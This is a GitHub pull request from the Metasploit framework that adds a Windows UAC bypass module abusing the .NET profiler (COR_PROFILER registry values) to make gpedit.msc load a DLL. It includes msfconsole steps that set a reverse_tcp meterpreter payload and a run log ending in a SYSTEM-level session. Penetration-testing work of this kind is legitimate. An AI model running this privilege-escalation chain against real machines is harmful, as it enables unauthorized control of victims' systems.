Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Windows Escalate UAC Protection Bypass (Via dot net profiler) #12516

Merged
merged 4 commits into from Nov 18, 2019

Conversation

@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Oct 31, 2019

This is another one of those auto-elevate registry key UAC bypass bugs. It targets the .Net profiler. Rather than launch an exe, it causes a trusted process (gpedit.msc) to load a dll.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • get a 64-bit meterpreter session
  • background your session
  • use windows/local/bypassuac_dotnet_profiler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <lhost>
  • set lport <lport>
  • set session <session>
  • set verbose true
  • run
  • getsystem
  • Verify you are system
  • Do the w00t dance

Example

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] UUID = 5c710086-74fa-4cce-a3fe-af4d318eed8a
[*] Writing  to HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32
[-] no implicit conversion of nil into Integer
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-10-30 18:05:45 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

Copy link
Contributor

acammack-r7 left a comment

Fun times! Just a little tidying to remember.

bwatters-r7 added 2 commits Nov 15, 2019
Add module docs
@bwatters-r7 bwatters-r7 marked this pull request as ready for review Nov 15, 2019
@bwatters-r7 bwatters-r7 removed the delayed label Nov 15, 2019
@busterb busterb self-assigned this Nov 15, 2019
@busterb busterb added docs and removed needs-docs labels Nov 18, 2019
bcook-r7 pushed a commit that referenced this pull request Nov 18, 2019
@bcook-r7 bcook-r7 merged commit 5936d2c into rapid7:master Nov 18, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Nov 18, 2019
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Nov 18, 2019

Release Notes

The bypassuac_dotnet_profiler module has been added to the framework. It is a privilege escalation exploit that targets the .Net profiler, causing a trusted process (gpedit.msc) to load a user-controlled DLL.

@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
6 participants
You can’t perform that action at this time.